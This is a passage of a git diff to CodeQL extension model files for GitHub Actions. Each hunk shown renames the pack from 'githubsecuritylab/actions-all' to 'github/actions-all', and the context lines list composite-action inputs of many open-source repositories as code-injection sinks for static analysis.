7f2e1588139e..5acd7348464c 100644 
--- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index eedeb3844223..365dd90b1206 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index fb6fb0267bb9..0d7a06175a59 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 60df7484e7f3..4c831ca673af 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index d0af7b61f989..40b5f413d661 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 8d08848d24c4..565bd119df75 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index f26f672a586c..31157d853d0e 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 5431aad8dca6..6208b63b89a9 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 92c23f9f1fbd..1073ddd49c18 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 52654194d81e..2b71886a286a 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 43c274aa0337..547bcca2ec97 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 7f8b87fa20ef..e8ed66af89af 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 31422a708c5a..af1327f7d7fa 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 30ccfdea6318..887743c2c703 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 9bc22ac93ef0..ff7e51e477ab 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 4ec47cb39750..55d0ddfba225 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 81d137ce5478..d4c0823c2ece 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 79675d59c056..7d789ec3ccca 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 3310a67347cd..2aa6633d752e 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index d12963b43db2..536e6d914a25 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 1c63a9e6d0f7..45bfb025ac99 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e120de812c40..bba69dfc7a0e 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 1be37285c9ef..0fbc67e2b1ba 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index aa6e9b684d08..6c6a4264d51f 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 221aa83de0b0..ee18012a8f54 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 710079324272..3dc390527074 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index bff13b29ecc1..b98826b9f021 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 1f75dd81c046..d000c5eb4d51 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 15604c34a17a..409ef9564d35 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index aef7f4f6242c..60a79604580c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f3a26e867ec6..4effdea078e3 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4feab5714c79..d2c44be62611 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 3030f81072a0..098782a6bef4 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 7f8885d1ec78..e08f4ba9bc24 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 93e6b1e03122..973264531584 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 5284159e9db5..8f6c13884c5c 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index ac8b8a5150ae..f7f2f139e85c 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 19e9448994eb..11b423e871c6 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 82c5713f9435..954b2d05858f 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 2d4108331b91..6cdb74f12782 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index ccd49962fa4b..e6820c900e3e 100644 
--- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index a7e56c8626d0..ba3ad6e8b0c9 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 4c0df425e458..114b8ce168e2 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index a69f2303dbe4..834353d89a82 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index c2c87969e936..1c903d71cbef 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c1c3bf433cdc..c34200337f2d 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index af21dca82055..19d14bbe9889 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 18fdeffe1ec2..0308c934d7e3 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index ee67e8821744..6039a6c36285 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 49caeb5f1dcf..4962f4f6281f 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index dda74b285da7..91c9e22df2ae 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 4b144103f8fb..760858b7eece 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 931658c0bb5e..8d219108234c 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: 